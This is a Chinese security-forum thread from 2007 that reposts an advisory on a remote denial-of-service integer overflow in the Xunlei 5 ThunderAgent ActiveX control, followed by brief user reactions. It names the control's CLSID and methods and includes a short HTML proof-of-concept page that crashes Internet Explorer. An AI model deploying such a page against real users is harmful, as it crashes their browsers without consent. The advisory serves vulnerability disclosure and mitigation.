查看: 2959|回复: 10
收起左侧

迅雷最新版本存在严重的远程拒绝服务漏洞(0day)

[复制链接]
wcfang
发表于 2007-1-1 11:08:10 | 显示全部楼层 |阅读模式
国内安全组织幻影ph4nt0m近日发布了讯雷最新版本的零日攻击漏洞:
迅雷5 ThunderAgent Module 远程拒绝服务漏洞
by axis(axis_at_ph4nt0m.org)


摘要:

迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户.迅雷5的ThunderAgent_005.dll中注册了一个activex 控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃.

影响版本:

迅雷5.5.2.252(已测试),
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响

细节:

在ThunderAgent_005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预料的结果,从而造成浏览器崩溃.

该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下:

[id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);

[id(0x00000007), helpstring("method GetTaskInfoStruct")]
void GetTaskInfoStruct([in] int pTaskInfo);

Codz:
POC:

<html>
<head>
   
<script>
function AxisFun()
{

    evil.GetTaskInfoStruct(0x7fffffff);

}
</script>
</head>

<OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT>


<script>java script:AxisFun();</script>
----------------------------------------------------------------------------------------
建议:

禁止ie执行activex

厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
陈青锋
发表于 2007-1-1 11:23:51 | 显示全部楼层
才知道的,支持楼主一下
dragoncui
发表于 2007-1-1 11:25:28 | 显示全部楼层
好像挺严重?

谢谢提醒了!
YoYo
发表于 2007-1-1 11:27:02 | 显示全部楼层
还好还没换最新版的!
quke1985
发表于 2007-1-1 11:35:38 | 显示全部楼层
zh这恐怖哦`
涼風
发表于 2007-1-1 12:32:06 | 显示全部楼层
没人攻击就好
taiyang143
发表于 2007-1-1 12:59:07 | 显示全部楼层
汗~~
我天天开迅雷   不定时炸弹啊~  
lovelnb
发表于 2007-1-1 13:09:06 | 显示全部楼层
严重吗?我的是迅雷5.5.2.252的哦,
怎么办,我还想搞个少将及别的啊.....
kang 该用户已被删除
发表于 2007-1-1 18:08:44 | 显示全部楼层
还好我还没升级。
kycyf111
发表于 2007-1-1 18:16:25 | 显示全部楼层
呵呵  最近在用超级旋风...
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 02:50 , Processed in 0.126901 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表